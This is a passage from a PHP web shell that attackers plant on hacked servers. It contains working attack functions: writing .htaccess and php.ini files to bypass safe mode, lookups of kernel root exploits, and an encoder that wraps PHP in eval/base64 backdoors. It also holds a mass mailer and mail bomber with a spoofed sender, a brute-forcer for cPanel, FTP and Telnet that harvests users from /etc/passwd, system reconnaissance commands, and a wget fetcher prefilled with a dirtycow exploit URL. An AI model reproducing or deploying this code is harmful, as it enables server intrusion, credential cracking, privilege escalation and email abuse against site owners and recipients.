  1607.             $s_file = $s_htaccess;
  1608.             break;
  1609.         case "s_htaccess_pl":
  1610.             $s_name = ".htaccess";
  1611.             $s_file = $s_htaccess_pl;
  1612.             break;
  1613.         case "s_ini_php":
  1614.             $s_name = "ini.php";
  1615.             $s_file = $ini_php;
  1616.             break;
  1617.     }
  1618.     if(function_exists('fopen') && function_exists('fwrite')) {
  1619.         $s_handle = fopen("$s_name", "w+");
  1620.         if($s_handle) {
  1621.             fwrite($s_handle, $s_file);
  1622.             alert("Operation Succeed!!!");
  1623.         } else {
  1624.             alert("Access Denied!!!");
  1625.         }
  1626.         fclose($s_handle);
  1627.     }
  1628. }
  1629. function ceklog() {
  1630. echo "
  1631. <style>
  1632. hr{color:silver;}
  1633. </style>
  1634. <pre>";
  1635. error_reporting(0);
  1636. class jalanin {
  1637. public function cuk($patch) {
  1638. foreach(scandir($patch) as $d) {
  1639. if($d!='.' && $d!='..') {
  1640. $d = $patch.DIRECTORY_SEPARATOR.$d;
  1641. if(!is_dir($d)) {
  1642. jalanin::cek($d);
  1643. } else {
  1644. jalanin::cuk($d);
  1645. }
  1646. }
  1647. }
  1648. }
  1649. public function cek($patch){
  1650. $exif="/exif_read_data/";
  1651. preg_match($exif,file_get_contents(addslashes($patch)), $match);
  1652. if($match[0]) {
  1653. echo "<font color='yellow'>[EXECUTION FILE]
  1654. ".$patch."</font><br><hr>";
  1655. } else if(exif_read_data($patch)) {
  1656. echo "<font color='red'>[LOGGER DETECTED]
  1657. ".$patch."</font><br><hr>";
  1658. } else {
  1659. echo "<font color='lime'>[FILE SAFE]
  1660. ".$patch."</font><br><hr>";
  1661. }
  1662. }
  1663. }
  1664. jalanin::cuk(getcwd());
  1665. }
  1666. function safe_mode_fuck_ui() {
  1667.     global $path;
  1668.     $path = getcwd();
  1669.     echo "<div id=result><br>
  1670.     <center><h2>Select Your Options</h2>
  1671.     <hr>
  1672.    <table class=tbl size=10><tr><td><a
  1673. href=?path={$path}&amp;safe_mode=s_php_ini>php.ini</a></td>
  1674.     <td><a
  1675. href=?path={$path}&amp;safe_mode=s_htaccess>.htaccess</a></td>
  1676.     <td><a
  1677. href=?path={$path}&amp;safe_mode=s_htaccess_pl>.htacces
  1678. (perl)</td>
  1679.     <td><a
  1680. href=?path={$path}&amp;safe_mode=s_ini_php>ini.php</td></tr></table><br><br></div>";
  1681. }
  1682. function AccessDenied() {
  1683.     global $path, $forbid_dir;
  1684.     $path = $_GET['path'];
  1685.     chdir($path);
  1686.     if(function_exists('fopen') && function_exists('fwrite')) {
  1687.         $forbid = fopen(".htaccess", "wb");
  1688.         if($forbid) {
  1689.             fwrite($forbid, $forbid_dir);
  1690.             alert("Opreation Succeeded");
  1691.         } else {
  1692.             alert("Access Denied");
  1693.         }
  1694.         fclose($forbid);
  1695.     }
  1696. }
  1697. function r00t_exploit() {
  1698.     $kernel  = php_uname();
  1699.     $r00t_db = array(
  1700.         '2.6.19' => 'jessica',
  1701.         '2.6.20' => 'jessica',
  1702.         '2.6.21' => 'jessica',
  1703.         '2.6.22' => 'jessica',
  1704.         '2.6.23' => 'jessica,vmsplice',
  1705.         '2.6.24' => 'jessica,vmspice',
  1706.         '2.6.31' => 'enlightment',
  1707.         '2.6.18' => 'brk,ptrace,kmod,brk2',
  1708.         '2.6.17' => 'prctl3,raptor_prctl,py2',
  1709.         '2.6.16' => 'raptor_prctl,exp.sh,raptor,raptor2,h00lyshit',
  1710.         '2.6.15' => 'py2,exp.sh,raptor,raptor2,h00lyshit',
  1711.         '2.6.14' => 'raptor,raptor2,h00lyshit',
  1712.         '2.6.13' =>
  1713. 'kdump,local26,py2,raptor_prctl,exp.sh,prctl3,h00lyshit',
  1714.         '2.6.12' => 'h00lyshit',
  1715.         '2.6.11' => 'krad3, krad,h00lyshit',
  1716.         '2.6.10' => 'h00lyshit,stackgrow2,uselib24,exp.sh,krad,krad2',
  1717.         '2.6.9' => 'exp.sh,krad3,py2, prctl3,h00lyshit',
  1718.         '2.6.8' => 'h00lyshit, krad, krad2',
  1719.         '2.6.7' => 'h00lyshit,krad,krad2',
  1720.         '2.6.6' => 'h00lyshit,krad,krad2',
  1721.         '2.6.2' => 'h00lyshit,krad,mremap_pte',
  1722.         '2.6.' => 'prctl,kmdx,newsmp,pwned,ptrace_kmod,ong_bak',
  1723.         '2.4.29' => 'elflbl,expand_stack,stackgrow2,uselib24,smpracer',
  1724.         '2.4.27' => 'elfdump,uselib24',
  1725.         '2.4.25' => 'uselib24',
  1726.         '2.4.24' => 'mremap_pte,loko,uselib24',
  1727.         '2.4.23' => 'mremap_pte,loko,uselib24',
  1728.         '2.4.22' =>
  1729. 'loginx,brk,km2,loko,ptrace,uselib24,brk2,ptrace-kmod',
  1730.         '2.4.21' => 'w00t,brk,uselib24,loginx,brk2,ptrace-kmod',
  1731.         '2.4.20' => 'mremap_pte,
  1732. w00t,brk,ave,uselib24,loginx,ptrace-kmod,ptrace,kmod',
  1733.         '2.4.19' => 'newlocal,w00t,ave,uselib24,loginx,kmod',
  1734.         '2.4.18' => 'km2, w00t,uselib24,loginx,kmod',
  1735.         '2.4.17' => 'newlocal,w00t,uselib24,loginx,kmod',
  1736.         '2.4.16' => 'w00t,uselib24,loginx',
  1737.         '2.4.10' => 'w00t,brk,uselib24,loginx',
  1738.         '2.4.9' => 'ptrace24,uselib24',
  1739.         '2.4.' => 'kmdx,remap,pwned,ptrace_kmod,ong_bak',
  1740.         '2.2.25' => 'mremap_pte',
  1741.         '2.2.24' => 'ptrace',
  1742.         '2.2.' => 'rip,ptrace'
  1743.     );
  1744.     foreach($r00t_db as $kern => $exp) {
  1745.         if(strstr($kernel, $kern)) {
  1746.             return $exp;
  1747.         } else {
  1748.             $exp = '<font color="red">Not
  1749. found.</font>';
  1750.             return $exp;
  1751.         }
  1752.     }
  1753. }
  1754. function php_ende_ui() {
  1755.     echo "
  1756. <div id=result><center><h2>PHP
  1757. ENCODE/DECODE</h2></center><hr><form
  1758. method='post'>
  1759.     <table class=tbl>
  1760.    <tr><td>
  1761.    Method : <select name='typed'
  1762. style='color:yellow;background-color:black;border:1px solid#666;'>
  1763.     <option>Encode</option>
  1764.     <option>Decode</decode>
  1765.     </select>
  1766. TYPE : <select name='typenc'
  1767. style='color:yellow;background-color:black;border:1px solid #666;'>
  1768. <option>GZINFLATE</option>
  1769. <option>GZUNCOMPRESS</option>
  1770. <option>STR_ROT13</option>
  1771. </tr></td><tr>
  1772. <td><textarea spellcheck='false' class=textarea_edit cols='80'
  1773. rows='25'
  1774. name='php_content'></textarea></tr></td></table><hr>
  1775. <input class='input_big' type='submit'
  1776. value='Submit'><br><hr><br><br></form></div>";
  1777. }
  1778. function php_ende_bg() {
  1779.     $meth_d  = $_POST['typed'];
  1780.     $typ_d   = $_POST['typenc'];
  1781.     $c_ntent = $_POST['php_content'];
  1782.     $c_ntent = $c_ntent;
  1783.     switch($meth_d) {
  1784.         case "Encode":
  1785.             switch($typ_d) {
  1786.                 case "GZINFLATE":
  1787.                     $res_t =
  1788. base64_encode(gzdeflate(trim(stripslashes($c_ntent . ' '), '<?php,
  1789. ?>'), 9));
  1790.                     $res_t = "<?php
  1791.                     eval(gzinflate(base64_decode(\"$res_t\")));
  1792. ?>";
  1793.                     break;
  1794.                 case "GZUNCOMPRESS":
  1795.                     $res_t =
  1796. base64_encode(gzcompress(trim(stripslashes($c_ntent . ' '), '<?php,
  1797. ?>'), 9));
  1798.                     $res_t = "<?php
  1799. eval(gzuncompress(base64_decode(\"$res_t\")));
  1800. ?>";
  1801.                     break;
  1802.                 case "STR_ROT13":
  1803.                     $res_t = trim(stripslashes($c_ntent . ' '), '<?php,
  1804. ?>');
  1805.                     $res_t = base64_encode(str_rot13($res_t));
  1806.                     $res_t = "<?php
  1807. eval(str_rot13(base64_decode(\"$res_t\")));
  1808. ?>";
  1809.                     break;
  1810.             }
  1811.             break;
  1812.         case "Decode":
  1813.             switch($typ_d) {
  1814.                 case "GZINFLATE":
  1815.                     $res_t = gzinflate(base64_decode($c_ntent));
  1816.                     break;
  1817.                 case "GZUNCOMPRESS":
  1818.                     $res_t = gzuncompress(base64_decode($c_ntent));
  1819.                     break;
  1820.                 case "STR_ROT13":
  1821.                     $res_t = str_rot13(base64_decode($c_ntent));
  1822.                     break;
  1823.             }
  1824.             break;
  1825.     }
  1826.     echo "<div id=result><center><h2>RaBiitch
  1827. Hidden
  1828. Backdoor</h2>
  1829.     <hr><textarea spellcheck='false' class=textarea_edit cols='80'
  1830. rows='25'>" . htmlspecialchars($res_t) .
  1831. "</textarea></center></div>";
  1832. }
  1833. function massmailer_ui() {
  1834.     echo "<div id=result><center><h2>MASS MAILER
  1835. & MAIL BOMBER</h2><hr>
  1836.     <table class=tbl width=40 style='col-width:40'>
  1837.     <td><table class=tbl><tr style='float:left;'>
  1838.     <td><font color=yellow size=4>Mass
  1839. Mail</font></td></tr>
  1840.     <form method='POST'><tr style='float:left;'>
  1841.     <td> FROM : </td>
  1842.     <td><input name='from' size=40
  1843. value='admin'></td></tr><tr style='float:left;'>
  1844.     <td>TO : </td><td><input size=40 name='to_mail'
  1845. value='kecutmasih10@gmail,kecutmasih10@gmail.com'></td></tr>
  1846.     <tr style='float:left;'>
  1847.     <td>Subject : </td><td><input size=40
  1848. name='subject_mail' value='Testing,'></td></tr>
  1849.     <tr style='float:left;'>
  1850.     <td><textarea spellcheck='false' class=textarea_edit cols='34'
  1851. rows='10' name='mail_content'>I'm doing
  1852. massmail :p</textarea></td>
  1853. <td><input class='input_big' type='submit'
  1854. value=O></td></tr></form></table></td>
  1855. <form method='post'>
  1856. <td> <table class='tbl'>
  1857. <td><font color=yellow size=4>Mail
  1858. Bomber</font></td></tr>
  1859. <tr style='float:left;'><td>TO : </td>
  1860. <td><input size='40' name='bomb_to'
  1861. value='kecutmasih10@gmail.com,chemicalsahinsa@yahoo.com'></td></tr><tr
  1862. style='float:left;'>
  1863. <td>Subject : </td>
  1864. <td><input size='40' name='bomb_subject' value='Bombing with
  1865. messages'></td></tr><tr style='float:left;'>
  1866. <td>No. of times</td><td><input size='40'
  1867. name='bomb_no' value='100'></td></tr><tr
  1868. style='float:left;'>
  1869. <td><textarea spellcheck='false' class=textarea_edit cols='34'
  1870. rows='10' name='bmail_content' required>I'm doing E-Mail Bombing
  1871. :p</textarea></td>
  1872. <td><input class='input_big' type='submit'
  1873. value='Submit'></td></tr></form></table>  
  1874. </td></tr></table>";
  1875. }
  1876. function massmailer_bg() {
  1877.     $from    = $_POST['from'];
  1878.     $to      = $_POST['to_mail'];
  1879.     $subject = $_POST['subject_mail'];
  1880.     $message = $_POST['mail_content'];
  1881.     if(function_exists('mail')) {
  1882.         if(mail($to, $subject, $message, "From:$from")) {
  1883.             echo "<div id=result><center><h2>MAIL
  1884. SPAMER</h2><hr /><br /><br /><font color=yellow
  1885. size=4>Successfully Mails
  1886. Send...</font><br><br><hr><br><br>";
  1887.         } else {
  1888.             echo "<div id=result><center><h2>MAIL
  1889. SPAMING</h2><hr /><br /><br /><font color=red
  1890. size=4>Sorry, failed to Mails Sending...
  1891. :(</font><br><br><hr><br><br>";
  1892.         }
  1893.     } else {
  1894.         echo "<div id=result><center><h2>MAIL
  1895. SPAMING</h2><hr /><br /><br /><font color=red
  1896. size=4>Sorry, failed to Mails Sending... :(</font><br
  1897. /><br /><hr /><br /><br />";
  1898.     }
  1899. }
  1900. function mailbomb_bg() {
  1901.     $rand    = rand(0, 9999999);
  1902.     $to      = $_POST['bomb_to'];
  1903.     $from    = "Polisi";
  1904.     $subject = $_POST['bomb_subject'] . " ID " . $rand;
  1905.     $times   = $_POST['bomb_no'];
  1906.     $content = $_POST['bmail_content'];
  1907.     if($times == '') {
  1908.         $times = 1000;
  1909.     }
  1910.     while($times--) {
  1911.         if(function_exists('mail')) {
  1912.             if(mail($to, $subject, $message, "From:$from")) {
  1913.                 echo "<div
  1914. id=result><center><h2>MAIL
  1915. SPAMING</h2><hr><br><br><font color=yellow
  1916. size=4>Successfully
  1917. Mails Bombed...
  1918. :p</font><br><br><hr><br><br>";
  1919.             } else {
  1920.                 echo "<div
  1921. id=result><center><h2>MAIL
  1922. SPAMING</h2><hr><br><br><font color=red
  1923. size=4>Sorry, failed to
  1924. Mails Bombing...
  1925. :(</font><br><br><hr><br><br>";
  1926.             }
  1927.         } else {
  1928.             echo "<div id=result><center><h2>MAIL
  1929. SPAMING</h2><hr /><br /><br /><font color=red
  1930. size=4>Sorry, failed to Mails Bombing...
  1931. :(</font><br><br><hr><br><br>";
  1932.         }
  1933.     }
  1934. }
  1935. function cpanel_check($host, $user, $pass, $timeout) {
  1936.     set_time_limit(0);
  1937.     global $cpanel_port;
  1938.     $ch = curl_init();
  1939.     curl_setopt($ch, CURLOPT_URL, "http://$host:" .
  1940. $cpanel_port);
  1941.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1942.     curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1943.     curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1944.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1945.     curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1946.     $data = curl_exec($ch);
  1947.     if(curl_errno($ch) == 28) {
  1948.         print "<b><font color=orange>Error :</font>
  1949. <font color=red>Connection Timeout. Please Check The Target Hostname
  1950. .</font></b>";
  1951.         exit;
  1952.     } else if(curl_errno($ch) == 0) {
  1953.         print "<b><font face=\"Iceland\"
  1954. style=\"font-size: 9pt\"
  1955. color=\"orange\">[~]</font></b><font
  1956. face=\"Iceland\"   style=\"font-size:
  1957. 9pt\"><b><font color=\"yellow\">
  1958.        Cracking Success With Username &quot;</font><font
  1959. color=\"#FF0000\">$user</font><font
  1960. color=\"#008000\">\" and Password
  1961. \"</font><font
  1962. color=\"#FF0000\">$pass</font><font
  1963. color=\"#008000\">\"</font></b><br><br>";
  1964.     }
  1965.     curl_close($ch);
  1966. }
  1967. function cpanel_crack() {
  1968.     set_time_limit(0);
  1969.     global $os;
  1970.     echo "<div id=result>";
  1971.     $cpanel_port     = "2082";
  1972.     $connect_timeout = 5;
  1973.     if(!isset($_POST['username']) && !isset($_POST['password'])
  1974. && !isset($_POST['target']) &&
  1975. !isset($_POST['cracktype']))
  1976. {
  1977. ?>
  1978.         <center>
  1979.         <form method=post>
  1980.         <table class=tbl>
  1981.             <tr>
  1982.                 <td align=center colspan=2>Target : <input type=text
  1983. name="server" value="localhost"
  1984. class=sbox></td>
  1985.             </tr>
  1986.             <tr>
  1987.                 <td align=center>User names</td><td
  1988. align=center>Password</td>
  1989.             </tr>
  1990.             <tr>
  1991.                 <td align=center><textarea spellcheck='false'
  1992. class=textarea_edit name=username rows=25 cols=35 class=box><?php
  1993.         if($os != "win") {
  1994.             if(@file('/etc/passwd')) {
  1995.                 $users = file('/etc/passwd');
  1996.                 foreach($users as $user) {
  1997.                     $user = explode(':', $user);
  1998.                     echo $user[0] . "\n";
  1999.                 }
  2000.             } else {
  2001.                 $temp = "";
  2002.                 $val1 = 0;
  2003.                 $val2 = 1000;
  2004.                 for(; $val1 <= $val2; $val1++) {
  2005.                     $uid = @posix_getpwuid($val1);
  2006.                     if($uid)
  2007.                         $temp .= join(':', $uid) . "\n";
  2008.                 }
  2009.                 $temp = trim($temp);
  2010.                 if($file5 = fopen("test.txt", "w")) {
  2011.                     fputs($file5, $temp);
  2012.                     fclose($file5);
  2013.                     $file = fopen("test.txt", "r");
  2014.                     while(!feof($file)) {
  2015.                         $s       = fgets($file);
  2016.                         $matches = array();
  2017.                         $t       = preg_match('/\/(.*?)\:\//s', $s,
  2018. $matches);
  2019.                         $matches = str_replace("home/",
  2020. "", $matches[1]);
  2021.                         if(strlen($matches) > 12 || strlen($matches) ==
  2022. 0 || $matches == "bin" || $matches == "etc/X11/fs" ||
  2023. $matches == "var/lib/nfs" || $matches ==
  2024. "var/arpwatch"
  2025. || $matches == "var/gopher" || $matches == "sbin" ||
  2026. $matches == "var/adm" || $matches == "usr/games" ||
  2027. $matches == "var/ftp" || $matches == "etc/ntp" ||
  2028. $matches == "var/www" || $matches == "var/named")
  2029.                             continue;
  2030.                         echo $matches;
  2031.                     }
  2032.                     fclose($file);
  2033.                 }
  2034.             }
  2035.         }
  2036. ?></textarea></td><td align=center><textarea
  2037. spellcheck='false' class=textarea_edit name=password rows=25 cols=35
  2038. class=box></textarea></td>
  2039.             </tr>
  2040.             <tr>
  2041.                 <td align=center colspan=2>Guess options :
  2042. <label><input
  2043. name="cracktype" type="radio" value="cpanel"
  2044. checked> Cpanel(2082)</label><label><input
  2045. name="cracktype" type="radio"
  2046. value="ftp">
  2047. Ftp(21)</label><label><input name="cracktype"
  2048. type="radio" value="telnet">
  2049. Telnet(23)</label></td>
  2050.             </tr>
  2051.             <tr>
  2052.                 <td align=center colspan=2>Timeout delay : <input
  2053. type="text" name="delay" value=5
  2054. class=sbox></td>
  2055.             </tr>
  2056.             <tr>
  2057.                 <td align=center colspan=2><input type="submit"
  2058. value="O" class=but></td>
  2059.             </tr>
  2060.         </table>
  2061.         </form>
  2062.         </center>
  2063.         <?php
  2064.     } else {
  2065.         if(empty($_POST['username']) || empty($_POST['password']))
  2066.             echo "<center>Please Enter The Users or Password
  2067. List</center>";
  2068.         else {
  2069.             $userlist = explode("\n", $_POST['username']);
  2070.             $passlist = explode("\n", $_POST['password']);
  2071.             if($_POST['cracktype'] == "ftp") {
  2072.                 foreach($userlist as $user) {
  2073.                     $pureuser = trim($user);
  2074.                     foreach($passlist as $password) {
  2075.                         $purepass = trim($password);
  2076.                         ftp_check($_POST['target'], $pureuser, $purepass,
  2077. $connect_timeout);
  2078.                     }
  2079.                 }
  2080.             }
  2081.             if($_POST['cracktype'] == "cpanel" ||
  2082. $_POST['cracktype'] == "telnet") {
  2083.                 if($cracktype == "telnet") {
  2084.                     $cpanel_port = "23";
  2085.                 } else
  2086.                     $cpanel_port = "2082";
  2087.                 foreach($userlist as $user) {
  2088.                     $pureuser = trim($user);
  2089.                     echo "<b><font face=Iceland
  2090. style=\"font-size:
  2091. 9pt\" color=#008000> [ - ] </font><font face=Iceland
  2092. style=\"font-size: 9pt\" color=#FF0800>
  2093.                         Processing user $pureuser
  2094. ...</font></b><br><br>";
  2095.                     foreach($passlist as $password) {
  2096.                         $purepass = trim($password);
  2097.                         cpanel_check($_POST['target'], $pureuser,
  2098. $purepass, $connect_timeout);
  2099.                     }
  2100.                 }
  2101.             }
  2102.         }
  2103.     }
  2104.     echo "</div>";
  2105. }
  2106. function get_users() {
  2107.     $userz = array();
  2108.     $user  = file("/etc/passwd");
  2109.     foreach($user as $userx => $usersz) {
  2110.         $userct = explode(":", $usersz);
  2111.         array_push($userz, $userct[0]);
  2112.     }
  2113.     if(!$user) {
  2114.         if($opd = opendir("/home/")) {
  2115.             while(($file = readdir($opd)) !== false) {
  2116.                 array_push($userz, $file);
  2117.             }
  2118.         }
  2119.         closedir($opd);
  2120.     }
  2121.     $userz = implode(', ', $userz);
  2122.     return $userz;
  2123. }
  2124. function exploit_details() {
  2125.     global $os;
  2126.     echo "<div id=result style='color:yellow;'><center>
  2127.    <h2>Exploit Server Details</h2><hr /><br
  2128. /><br /><table class=table
  2129. style='color:yellow;text-align:center'><tr><td>
  2130.    OS: <a style='color:7171C6;text-decoration:none;' target=_blank
  2131. href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description="
  2132. . php_uname(s) . "'>" . php_uname(s) .
  2133. "</td></tr>
  2134.    <tr><td>PHP Version : <a
  2135. style='color:7171C6;text-decoration:none;' target=_blank
  2136. href='?phpinfo'>" . phpversion() . ".</td></tr>
  2137.    <tr><td>Kernel Release : <font
  2138. color=7171C6>" . php_uname(r) .
  2139. "</font></td></tr>
  2140.    <tr><td>Kernel Version : <font
  2141. color=7171C6>" . php_uname(v) .
  2142. "</font></td></td>
  2143.    <tr><td>Machine : <font
  2144. color=7171C6>" . php_uname(m) .
  2145. "</font></td</tr>
  2146.    <tr><td>Server Software : <font
  2147. color=7171C6>" . $_SERVER['SERVER_SOFTWARE'] .
  2148. "</font></td</tr><tr>";
  2149.     if(function_exists('apache_get_modules')) {
  2150.         echo "<tr><td style='text-align:left;'>Loaded
  2151. Apache
  2152. modules : <br /><br /><font color=7171C6>";
  2153.         echo implode(', ', apache_get_modules());
  2154.         echo "</font></tr></td>";
  2155.     }
  2156.     if($os == 'win') {
  2157.         echo "<tr><td style='text-align:left;'>Account
  2158. Setting : <font color=7171C6><pre>" . cmd('net
  2159. accounts') . "</pre></td></tr>
  2160.               <tr><td style='text-align:left'>User Accounts :
  2161. <font color=7171C6><pre>" . cmd('net
  2162. user') . "</pre></td></tr>
  2163.               ";
  2164.     }
  2165.     if($os == 'nix') {
  2166.         echo "<tr><td style='text-align:left'>Distro :
  2167. <font color=7171C6><pre>" . cmd('cat
  2168. /etc/*-release') . "</pre></font></td></tr>
  2169.              <tr><td style='text-align:left'>Distr name :
  2170. <font color=7171C6><pre>" . cmd('cat
  2171. /etc/issue.net') . "</pre></font></td></tr>
  2172.              <tr><td style='text-align:left'>GCC : <font
  2173. color=7171C6><pre>" . cmd('whereis
  2174. gcc') . "</pre></td></tr>
  2175.              <tr><td style='text-align:left'>PERL : <font
  2176. color=7171C6><pre>" . cmd('whereis
  2177. perl') . "</pre></td></tr>
  2178.              <tr><td style='text-align:left'>PYTHON :
  2179. <font
  2180. color=7171C6><pre>" . cmd('whereis
  2181. python') . "</pre></td></tr>
  2182.              <tr><td style='text-align:left'>JAVA : <font
  2183. color=7171C6><pre>" . cmd('whereis
  2184. java') . "</pre></td></tr>
  2185.              <tr><td style='text-align:left'>APACHE :
  2186. <font
  2187. color=7171C6><pre>" . cmd('whereis
  2188. apache') . "</pre></td></tr>
  2189.              <tr><td style='text-align:left;'>CPU : <br
  2190. /><br /><pre><font color=7171C6>" . cmd('cat
  2191. /proc/cpuinfo') . "</font></pre></td></tr>
  2192.              <tr><td style='text-align:left'>RAM : <font
  2193. color=7171C6><pre>" . cmd('free
  2194. -m') . "</pre></td></tr>
  2195.              <tr><td style='text-align:left'> User Limits :
  2196. <br /><br /><font
  2197. color=7171C6><pre>" . cmd('ulimit
  2198. -a') . "</pre></td></tr>";
  2199.         $useful = array(
  2200.             'gcc',
  2201.             'lcc',
  2202.             'cc',
  2203.             'ld',
  2204.             'make',
  2205.             'php',
  2206.             'perl',
  2207.             'python',
  2208.             'ruby',
  2209.             'tar',
  2210.             'gzip',
  2211.             'bzip',
  2212.             'bzip2',
  2213.             'nc',
  2214.             'locate',
  2215.             'suidperl'
  2216.         );
  2217.         $uze    = array();
  2218.         foreach($useful as $uzeful) {
  2219.             if(cmd("which $uzeful")) {
  2220.                 $uze[] = $uzeful;
  2221.             }
  2222.         }
  2223.         echo "<tr><td
  2224. style='text-align:left'>Useful
  2225. : <br /><font color=7171C6><pre>";
  2226.         echo implode(', ', $uze);
  2227.         echo "</pre></td></tr>";
  2228.         $downloaders = array(
  2229.             'wget',
  2230.             'fetch',
  2231.             'lynx',
  2232.             'links',
  2233.             'curl',
  2234.             'get',
  2235.             'lwp-mirror'
  2236.         );
  2237.         $uze         = array();
  2238.         foreach($downloaders as $downloader) {
  2239.             if(cmd("which $downloader")) {
  2240.                 $uze[] = $downloader;
  2241.             }
  2242.         }
  2243.         echo "<tr><td
  2244. style='text-align:left'>Downloaders : <br /><font
  2245. color=7171C6><pre>";
  2246.         echo implode(', ', $uze);
  2247.         echo "</pre></td></tr>";
  2248.         echo "<tr><td style='text-align:left'>Users
  2249. : <br /><font
  2250. color=7171C6><pre>" . wordwrap(get_users()) .
  2251. "</pre</font>></td></tr>
  2252.                    <tr><td style='text-align:left'>Hosts :
  2253. <br /><font color=7171C6><pre>" . cmd('cat
  2254. /etc/hosts') .
  2255. "</pre></font></td></tr>";
  2256.     }
  2257.     echo "</table><br /><br /><hr /><br
  2258. /><br />";
  2259. }
  2260. function remote_file_check_ui() {
  2261.     echo "<div id=result><center><h2>Remote File
  2262. Check</h2><hr /><br /><br />
  2263.          <table class=tbl><form
  2264. method='POST'><tr><td>URL : <input size=50
  2265. name='rem_web'
  2266. value='http://www.facebook.com/'></td></tr>
  2267.          <tr><td><font color=red>Input File's Names in
  2268. TextArea</font></tr></td><tr><td><textarea
  2269. spellcheck='false' class='textarea_edit' cols=50 rows=30
  2270. name='tryzzz'>
  2271. x.php
  2272. .env
  2273. robots.txt
  2274. .htacces
  2275. nekopoi.mp4
  2276. c99.php
  2277. r57.php
  2278. B374k.php
  2279. </textarea></td></tr>
  2280.         <tr><td><br>
  2281.          <input type='submit' value='submit' class='input_big'>
  2282.        
  2283. <br><br></td></tr></form></table><br
  2284. ><br><hr><br><br>";
  2285. }
  2286. function remote_file_check_bg() {
  2287.     set_time_limit(0);
  2288.     $rtr = array();
  2289.     echo "<div id=result><center><h2>Scanner
  2290. Report</h2><hr /><br /><br /><table
  2291. class=tbl>";
  2292.     $webz   = $_POST['rem_web'];
  2293.     $uri_in = $_POST['tryzzz'];
  2294.     $r_xuri = trim($uri_in);
  2295.     $r_xuri = explode("\n", $r_xuri);
  2296.     foreach($r_xuri as $rty) {
  2297.         $urlzzx = $webz . $rty;
  2298.         if(function_exists('curl_init')) {
  2299.             echo "<tr><td
  2300. style='text-align:left'><font
  2301. color=orange>Checking : </font> <font color=7171C6> $urlzzx
  2302. </font></td>";
  2303.             $ch = curl_init($urlzzx);
  2304.             curl_setopt($ch, CURLOPT_NOBODY, true);
  2305.             curl_exec($ch);
  2306.             $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  2307.             curl_close($ch);
  2308.             if($status_code == 200) {
  2309.                 echo "<td style='text-align:left'><font
  2310. color=yellow> Found....</font></td></tr>";
  2311.             } else {
  2312.                 echo "<td style='text-align:left'><font
  2313. color=red>Not Found...</font></td></tr>";
  2314.             }
  2315.         } else {
  2316.             echo "<font color=red>cURL Not Found
  2317. </font>";
  2318.             break;
  2319.         }
  2320.     }
  2321.     echo "</table><br /><br /><hr /><br
  2322. /><br /></div>";
  2323. }
  2324. function remote_download_ui() {
  2325.     echo "<div id=result><center><h2>Remote File
  2326. Download</h2><hr><br><br><table
  2327. class=tbl><form method='GET'><input type=hidden name='path'
  2328. value=" . getcwd() . "><tr><td><select
  2329. style='color:yellow; background-color:black; border:1px solid #666;'
  2330. name='type_r_down'><option>WGET</option><option>cURL</option></select></td></tr>
  2331.    <tr><td>URL <input size=50 name='rurlfile'
  2332. value='https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c'></td></tr>
  2333.    <tr><td><input type='submit' class='input_big'
  2334. value='submit'
  2335. /></td></tr></form></table><br><br><hr><br><br></div>";
  2336. }
  2337. function remote_download_bg() {
  2338.     chdir($_GET['path']);
  2339.     global $os;
  2340.     $opt      = $_GET['type_r_down'];
  2341.     $rt_ffile = $_GET['rurlfile'];
  2342.     $name     = basename($rt_ffile);
  2343.     echo "<div id=result>";
  2344.     switch($opt) {
  2345.         case "WGET":
  2346.             if($os != 'win') {
  2347.                 cmd("wget $rt_ffile");
  2348.                 alert("Downloaded Successfully...");
  2349.             } else {
  2350.                 alert("Its Windows OS... WGET is not
  2351. available");
  2352.             }
  2353.             break;
  2354.         case "cURL":
  2355.             if(function_exists('curl_init')) {
  2356.                 $ch = curl_init($rt_ffile);
  2357.                 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2358.                 $data = curl_exec($ch);
  2359.                 curl_close($ch);
  2360.                 file_put_contents($name, $data);
  2361.                 alert("Download succeeded");
  2362.             } else {
  2363.                 alert("cURL Not Available");
  2364.             }
  2365.             break;
  2366.     }
  2367.     echo "</div>";
  2368. }
  2369. function hex_encode_ui() {
  2370.     if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx'])) {
  2371.         $tyx      = $_POST['tyxxx'];
  2372.         $rezultzz = $_POST['hexinp'];
  2373.         switch($tyx) {
  2374.             case "Encode":
  2375.                 $rzul = PREG_REPLACE("'(.)'e",
  2376. "dechex(ord('\\1'))", $rezultzz);
  2377.                 echo "<div
  2378. id=result><center><h2>HEXADECIMAL
  2379. ENCODER</h2><hr><br><br>
  2380.                <textarea class='textarea_edit' spellcheck=false
  2381. cols=60
  2382. rows=10>$rzul</textarea>
  2383.                <br /><br /><form
  2384. method='POST'><select style='color:yellow; background-color:black;
  2385. border:1px solid #666;'
  2386. name='tyxxx'><option>Encode</option><option>Decode</option></select>
  2387.                Input : <input name='hexinp' size=50 value='input
  2388. here'><input type=submit value='submit'
  2389. /><br><br><hr><br><br></div>";
  2390.                 break;
  2391.             case "Decode":
  2392.                 $rzul = PREG_REPLACE("'([\S,\d]{2})'e",
  2393. "chr(hexdec('\\1'))", $rezultzz);
  2394.                 echo "<div
  2395. id=result><center><h2>HEXADECIMAL
  2396. ENCODER</h2><hr><br><br>
  2397.                <textarea class='textarea_edit' spellcheck=false
  2398. cols=60
  2399. rows=10>$rzul</textarea>
  2400.                <br /><br /><form
  2401. method='POST'><select style='color:yellow; background-color:black;
  2402. border:1px solid #666;'
  2403. name='tyxxx'><option>Encode</option><option>Decode</option></select>
  2404.                Input : <input name='hexinp' size=50 value='input
  2405. here'><input type=submit value='submit'
  2406. /><br><br><hr><br><br></div>";
  2407.                 break;
  2408.         }
  2409.     } else {
  2410.         echo "<div
  2411. id=result><center><h2>HEXADECIMAL
  2412. ENCODER</h2><hr /><br /><br />
  2413.        <textarea class='textarea_edit' spellcheck=false cols=60
  2414. rows=10>Here visible Your Result</textarea>
  2415.        <br /><br /><form method='POST'><select
  2416. style='color:yellow; background-color:black; border:1px solid #666;'
